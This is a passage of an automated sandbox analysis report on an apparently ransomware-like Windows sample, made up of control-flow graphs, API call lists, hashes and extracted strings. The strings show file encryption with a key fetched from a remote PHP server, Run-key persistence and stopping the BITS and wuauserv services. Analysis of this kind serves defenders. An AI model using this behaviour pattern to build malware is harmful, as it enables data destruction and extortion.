                  • Part of subcall function 00007FF6F18A4E70: _Mtx_unlock.MSVCP140 ref: 00007FF6F18A4EC5
                  • Part of subcall function 00007FF6F18A4E70: _Cnd_broadcast.MSVCP140 ref: 00007FF6F18A4ED2
                  • Part of subcall function 00007FF6F18A4E70: _Thrd_id.MSVCP140 ref: 00007FF6F18A4EEE
                  • Part of subcall function 00007FF6F18A4E70: _Thrd_join.MSVCP140 ref: 00007FF6F18A4F0C
                  • Part of subcall function 00007FF6F18A4E70: _Cnd_destroy_in_situ.MSVCP140 ref: 00007FF6F18A4F30
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A89EA
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8A44
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8AA6
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8B08
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A8BCF
                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A8BDA
                • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18A8C3B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo_noreturn$V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$Concurrency::cancel_current_task$memmove$?good@ios_base@std@@ErrorLastOpenmemset$?always_noconv@codecvt_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@Bios_base@std@@CloseCnd_broadcastCnd_destroy_in_situCnd_init_in_situCpp_error@std@@FileManagerModuleMtx_lockMtx_unlockNameOsfx@?$basic_ostream@Thrd_hardware_concurrencyThrd_idThrd_joinThrow_V12@Value__std_fs_code_page_dupenv_smalloc
                • String ID: &hwid=$.$.dll$.exe$BITS$Chat Session Response: $Encryption Key: $Encryption process initiated.$Failed to create chat session with PHP app$Failed to retrieve encryption key from PHP app$MyEncryptor$RegOpenKeyEx failed with error: $Software\Microsoft\Windows\CurrentVersion\Run$Windows$directory_entry::status$directory_iterator::directory_iterator$directory_iterator::operator++$hat_id=$wuauserv
                • API String ID: 3815261804-2131133029
                • Opcode ID: a3496ff0b8bf30f313e674f80c7c7f1cc76cf0a4d9d1524f2d81c3be7c603a95
                • Instruction ID: 7c2b7a8516c16fc916eb70aedb6a1b472c5eecef75fbcd87b6d5425c2f75dd24
                • Opcode Fuzzy Hash: a3496ff0b8bf30f313e674f80c7c7f1cc76cf0a4d9d1524f2d81c3be7c603a95
                • Instruction Fuzzy Hash: 65B29772A28BC692EB20DB65E5403BA6351FB857D0F505332DABD82AD9EF7CD085C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 311 7ff6f18a5a50-7ff6f18a5aae call 7ff6f18ab370 314 7ff6f18a5ab0 311->314 315 7ff6f18a5ab3-7ff6f18a5af1 call 7ff6f18ad310 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z InternetOpenW 311->315 314->315 318 7ff6f18a5b4f-7ff6f18a5b54 315->318 319 7ff6f18a5af3-7ff6f18a5b4a call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff6f18abf80 315->319 321 7ff6f18a5b61-7ff6f18a5b64 318->321 322 7ff6f18a5b56-7ff6f18a5b5f 318->322 329 7ff6f18a5c8d-7ff6f18a5cba call 7ff6f18cdbf0 319->329 324 7ff6f18a5b67-7ff6f18a5be6 call 7ff6f18ab590 InternetCrackUrlW 321->324 322->324 330 7ff6f18a5cbb-7ff6f18a5cef InternetConnectW 324->330 331 7ff6f18a5bec-7ff6f18a5c55 call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z InternetCloseHandle call 7ff6f18abf80 324->331 333 7ff6f18a5cf1 330->333 334 7ff6f18a5cfd-7ff6f18a5d41 HttpOpenRequestW 330->334 331->329 349 7ff6f18a5c57-7ff6f18a5c6d 331->349 333->334 337 7ff6f18a5d43-7ff6f18a5d7d call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z InternetCloseHandle 334->337 338 7ff6f18a5d88-7ff6f18a5da0 HttpSendRequestW 334->338 337->338 340 7ff6f18a5df0-7ff6f18a5e20 InternetReadFile 338->340 341 7ff6f18a5da2-7ff6f18a5de5 call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z InternetCloseHandle * 2 338->341 346 7ff6f18a5e22-7ff6f18a5e27 340->346 347 7ff6f18a5e77-7ff6f18a5ef6 InternetCloseHandle * 3 call 7ff6f18ab370 call 7ff6f18ad310 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 340->347 341->340 346->347 351 7ff6f18a5e29-7ff6f18a5e2f 346->351 347->329 366 7ff6f18a5efc-7ff6f18a5f12 347->366 353 7ff6f18a5c6f-7ff6f18a5c82 349->353 354 7ff6f18a5c88 call 7ff6f18cdfc4 349->354 355 7ff6f18a5e35-7ff6f18a5e3e 351->355 356 7ff6f18a5f38-7ff6f18a5f3f call 7ff6f18cdd18 351->356 353->354 359 7ff6f18a5f31-7ff6f18a5f37 _invalid_parameter_noinfo_noreturn 353->359 354->329 362 7ff6f18a5e45-7ff6f18a5e4d 355->362 359->356 362->362 365 7ff6f18a5e4f-7ff6f18a5e75 call 7ff6f18aada0 InternetReadFile 362->365 365->346 365->347 366->354 368 7ff6f18a5f18-7ff6f18a5f2b 366->368 368->354 368->359
                APIs
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
                  • Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
                  • Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
                  • Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
                  • Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5AC8
                • InternetOpenW.WININET ref: 00007FF6F18A5AE5
                • GetLastError.KERNEL32 ref: 00007FF6F18A5B09
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5B14
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5B24
                • InternetCrackUrlW.WININET ref: 00007FF6F18A5BDE
                • GetLastError.KERNEL32 ref: 00007FF6F18A5C02
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5C0D
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5C1D
                • InternetCloseHandle.WININET ref: 00007FF6F18A5C26
                • InternetConnectW.WININET ref: 00007FF6F18A5CE3
                • HttpOpenRequestW.WININET ref: 00007FF6F18A5D35
                • GetLastError.KERNEL32 ref: 00007FF6F18A5D59
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5D64
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5D74
                • InternetCloseHandle.WININET ref: 00007FF6F18A5D7D
                • HttpSendRequestW.WININET ref: 00007FF6F18A5D98
                • GetLastError.KERNEL32 ref: 00007FF6F18A5DB8
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5DC3
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5DD3
                • InternetCloseHandle.WININET ref: 00007FF6F18A5DDC
                • InternetCloseHandle.WININET ref: 00007FF6F18A5DE5
                  • Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$Internet$V01@@$CloseErrorHandleLast$?good@ios_base@std@@HttpOpenRequest$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@ConnectCrackOsfx@?$basic_ostream@SendV12@
                • String ID: Encryptor$GET$GET request completed with response: $HttpOpenRequest failed with error: $HttpSendRequest failed with error: $InternetConnect failed with error: $InternetCrackUrl failed with error: $InternetOpen failed with error: $Making GET request to: $h$text/*
                • API String ID: 1551654344-1827163079
                • Opcode ID: 779ffa6e9fdf7313ca3d8674e6eee0c4e89e3e5b2f46ff701b89a174844bc3ba
                • Instruction ID: 64b0817dac2f69f2832c9c61d8dfb07da3a31620ead4a685306cc1a59d767dcc
                • Opcode Fuzzy Hash: 779ffa6e9fdf7313ca3d8674e6eee0c4e89e3e5b2f46ff701b89a174844bc3ba
                • Instruction Fuzzy Hash: EFE15F61F28B4396EB10DB65EA542A83762FB45BD4F405232DE7D82AD8EF7CD185C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 424 7ff6f18c48c0-7ff6f18c48ec 425 7ff6f18c490f-7ff6f18c4944 424->425 426 7ff6f18c48ee-7ff6f18c48f1 424->426 429 7ff6f18c4946-7ff6f18c4949 425->429 430 7ff6f18c496c-7ff6f18c498e 425->430 427 7ff6f18c48f3-7ff6f18c48fd free 426->427 428 7ff6f18c4902-7ff6f18c4907 call 7ff6f18b8a50 426->428 427->428 440 7ff6f18c490c 428->440 434 7ff6f18c494b-7ff6f18c4955 call 7ff6f18b8a40 429->434 435 7ff6f18c495a-7ff6f18c4969 call 7ff6f18afac0 429->435 431 7ff6f18c4990-7ff6f18c4995 call 7ff6f18c92d0 430->431 432 7ff6f18c499c-7ff6f18c49a3 430->432 431->432 438 7ff6f18c49a5-7ff6f18c49a7 432->438 439 7ff6f18c49e8-7ff6f18c49f1 432->439 434->435 435->430 446 7ff6f18c49ae-7ff6f18c49b5 438->446 447 7ff6f18c49a9 call 7ff6f18c92d0 438->447 443 7ff6f18c49f3-7ff6f18c49f6 439->443 444 7ff6f18c4a57-7ff6f18c4b50 memset call 7ff6f18b9390 439->444 440->425 449 7ff6f18c49f8-7ff6f18c4a04 _errno 443->449 450 7ff6f18c4a06-7ff6f18c4a09 443->450 458 7ff6f18c4c81-7ff6f18c4c8d 444->458 459 7ff6f18c4b56-7ff6f18c4b59 444->459 446->439 452 7ff6f18c49b7-7ff6f18c49d1 call 7ff6f18ccab0 446->452 447->446 454 7ff6f18c4a51 _invalid_parameter_noinfo 449->454 455 7ff6f18c4a20-7ff6f18c4a30 memset 450->455 456 7ff6f18c4a0b-7ff6f18c4a0e 450->456 471 7ff6f18c5362-7ff6f18c5376 452->471 472 7ff6f18c49d7-7ff6f18c49e3 call 7ff6f18cca40 452->472 454->444 461 7ff6f18c4a40-7ff6f18c4a43 455->461 462 7ff6f18c4a32-7ff6f18c4a3e _errno 455->462 456->455 460 7ff6f18c4a10-7ff6f18c4a1e memmove 456->460 473 7ff6f18c4c93-7ff6f18c4c9c 458->473 474 7ff6f18c4d59-7ff6f18c4d62 458->474 464 7ff6f18c4b6c-7ff6f18c4b6f 459->464 465 7ff6f18c4b5b-7ff6f18c4b6a 459->465 460->444 461->444 466 7ff6f18c4a45-7ff6f18c4a4b _errno 461->466 462->454 468 7ff6f18c4be6-7ff6f18c4c7b 464->468 469 7ff6f18c4b71-7ff6f18c4be2 464->469 465->468 466->454 468->458 468->459 469->468 472->471 478 7ff6f18c4d21-7ff6f18c4d54 call 7ff6f18b9390 * 2 473->478 479 7ff6f18c4ca2-7ff6f18c4ca8 473->479 476 7ff6f18c4d64 call 7ff6f18c40d0 474->476 477 7ff6f18c4d69-7ff6f18c4d7c 474->477 476->477 482 7ff6f18c4d82-7ff6f18c4d8c 477->482 483 7ff6f18c50fd-7ff6f18c532b 477->483 488 7ff6f18c532e-7ff6f18c5335 478->488 484 7ff6f18c4cb0-7ff6f18c4d0a 479->484 487 7ff6f18c4d90-7ff6f18c50f7 482->487 483->488 484->484 489 7ff6f18c4d0c-7ff6f18c4d1a 484->489 487->483 487->487 491 7ff6f18c5337 call 7ff6f18c92d0 488->491 492 7ff6f18c533c-7ff6f18c5343 488->492 489->478 491->492 492->471 495 7ff6f18c5345-7ff6f18c535d call 7ff6f18b9390 492->495 495->471
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: _errno$memset$_invalid_parameter_noinfofreememmove
                • String ID:
                • API String ID: 4025154296-3916222277
                • Opcode ID: c053c19a76897f507298a9e536f113175db39d14dab8922e58873422ee272503
                • Instruction ID: c8abffe500d892cca5df900a477cc46021d40a84dd74808afb523ba04feff084
                • Opcode Fuzzy Hash: c053c19a76897f507298a9e536f113175db39d14dab8922e58873422ee272503
                • Instruction Fuzzy Hash: 845297B36249A44BD302CF2995149BE3BA4EB5D345B854711EBA68B7C0CE3CF915EF20

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: CryptErrorLast$AcquireAlgorithmCloseExceptionExclusiveLockProviderRandomThrowfreememmove
                • String ID: BCryptGenRandom
                • API String ID: 548136003-3013187443
                • Opcode ID: b97b5cdcb7384609a645a121b1d1b5e4ef8c60fc4ec722f09304880976647378
                • Instruction ID: 76e0b21010867cc44c3be8012c0bbcb87c0d169b42ba14dfc677a0c1eaf9208c
                • Opcode Fuzzy Hash: b97b5cdcb7384609a645a121b1d1b5e4ef8c60fc4ec722f09304880976647378
                • Instruction Fuzzy Hash: 21415F21A28B8295EB20EB61EA506B96761FF847D0F441235DA7DC36E5EF3CE545CB00

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: b46cb798c7cb54dc8782471115466e98de31e4b37c053175dd5771e29f631880
                • Instruction ID: 8b7509c6238c08b5734a2dbe5d9c8385a122184533e83f8506001b08c6ee0664
                • Opcode Fuzzy Hash: b46cb798c7cb54dc8782471115466e98de31e4b37c053175dd5771e29f631880
                • Instruction Fuzzy Hash: 85C09210E3E603D2E30837A10A820B919925F453D0F100232E13DD16E2BF5C24A22B52

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 370 7ff6f18a73f0-7ff6f18a7420 OpenSCManagerW 371 7ff6f18a745e-7ff6f18a7480 370->371 372 7ff6f18a7422-7ff6f18a7459 call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 370->372 374 7ff6f18a765f-7ff6f18a7678 CloseServiceHandle 371->374 375 7ff6f18a7486-7ff6f18a7489 371->375 376 7ff6f18a7680-7ff6f18a7694 call 7ff6f18cdbf0 372->376 374->376 378 7ff6f18a7490-7ff6f18a7495 375->378 380 7ff6f18a74a3-7ff6f18a74aa 378->380 381 7ff6f18a7497-7ff6f18a74a1 378->381 383 7ff6f18a74ad-7ff6f18a74bc call 7ff6f18ab590 380->383 381->383 386 7ff6f18a74be 383->386 387 7ff6f18a74c1-7ff6f18a74df OpenServiceW 383->387 386->387 388 7ff6f18a74e1-7ff6f18a74f8 387->388 389 7ff6f18a7518-7ff6f18a752f 387->389 390 7ff6f18a7513 call 7ff6f18cdfc4 388->390 391 7ff6f18a74fa-7ff6f18a750d 388->391 392 7ff6f18a75f3-7ff6f18a760e call 7ff6f18ab370 389->392 393 7ff6f18a7535-7ff6f18a754a ControlService 389->393 390->389 391->390 394 7ff6f18a7695-7ff6f18a769b _invalid_parameter_noinfo_noreturn 391->394 404 7ff6f18a7610 392->404 405 7ff6f18a7613-7ff6f18a764c call 7ff6f18ad310 call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 392->405 396 7ff6f18a7589-7ff6f18a75a4 call 7ff6f18ab370 393->396 397 7ff6f18a754c-7ff6f18a7567 call 7ff6f18ab370 393->397 406 7ff6f18a75a6 396->406 407 7ff6f18a75a9-7ff6f18a75d2 call 7ff6f18ad310 call 7ff6f18ab370 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z 396->407 408 7ff6f18a7569 397->408 409 7ff6f18a756c-7ff6f18a7587 call 7ff6f18ad310 call 7ff6f18ab370 397->409 404->405 420 7ff6f18a7652-7ff6f18a7659 405->420 406->407 423 7ff6f18a75d8-7ff6f18a75f1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z CloseServiceHandle 407->423 408->409 409->423 420->374 420->378 423->420
                APIs
                • OpenSCManagerW.ADVAPI32 ref: 00007FF6F18A7414
                • GetLastError.KERNEL32 ref: 00007FF6F18A7438
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A7443
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7453
                • OpenServiceW.ADVAPI32 ref: 00007FF6F18A74CD
                • ControlService.ADVAPI32 ref: 00007FF6F18A7542
                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A75E2
                • CloseServiceHandle.ADVAPI32 ref: 00007FF6F18A75EB
                • CloseServiceHandle.ADVAPI32 ref: 00007FF6F18A7662
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
                  • Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
                  • Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
                  • Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
                  • Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
                  • Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510
                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7695
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true
                • Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd
                Similarity
                • API ID: D@std@@@std@@U?$char_traits@$V01@$Service$??6?$basic_ostream@$?good@ios_base@std@@CloseHandleOpenV01@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@ControlErrorLastManagerOsfx@?$basic_ostream@V12@_invalid_parameter_noinfo_noreturn
                • String ID: stopped successfully.$ with error: $ControlService failed for $OpenSCManager failed with error: $OpenService failed for $Service
                • API String ID: 2585847418-2969218038
                • Opcode ID: 97f9fa63221918c2ecea67cca088f683bc3ac6efee5b930e716397e102193402
                • Instruction ID: 216879ddd7c71b20c389814b5e482f8a3ca85d8538c1e1516eaa30d4519b9b6b
                • Opcode Fuzzy Hash: 97f9fa63221918c2ecea67cca088f683bc3ac6efee5b930e716397e102193402
                • Instruction Fuzzy Hash: CD713765B28B8792EB14EB26E64427937A2AF45BC4F005132DD7E877E9EF3CE4458340

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 497 7ff6f18ab370-7ff6f18ab399 498 7ff6f18ab3a0-7ff6f18ab3a7 497->498 498->498 499 7ff6f18ab3a9-7ff6f18ab3b8 498->499 500 7ff6f18ab3c4 499->500 501 7ff6f18ab3ba-7ff6f18ab3bd 499->501 503 7ff6f18ab3c6-7ff6f18ab3d6 500->503 501->500 502 7ff6f18ab3bf-7ff6f18ab3c2 501->502 502->503 504 7ff6f18ab3df-7ff6f18ab3f1 ?good@ios_base@std@@QEBA_NXZ 503->504 505 7ff6f18ab3d8-7ff6f18ab3de 503->505 506 7ff6f18ab423-7ff6f18ab429 504->506 507 7ff6f18ab3f3-7ff6f18ab402 504->507 505->504 511 7ff6f18ab435-7ff6f18ab448 506->511 512 7ff6f18ab42b-7ff6f18ab430 506->512 509 7ff6f18ab421 507->509 510 7ff6f18ab404-7ff6f18ab407 507->510 509->506 510->509 516 7ff6f18ab409-7ff6f18ab41f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 510->516 514 7ff6f18ab47d-7ff6f18ab498 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 511->514 515 7ff6f18ab44a 511->515 513 7ff6f18ab4ed-7ff6f18ab50b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 512->513 520 7ff6f18ab517-7ff6f18ab527 513->520 521 7ff6f18ab50d-7ff6f18ab516 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 513->521 518 7ff6f18ab4c6 514->518 519 7ff6f18ab49a 514->519 517 7ff6f18ab450-7ff6f18ab453 515->517 516->506 517->514 524 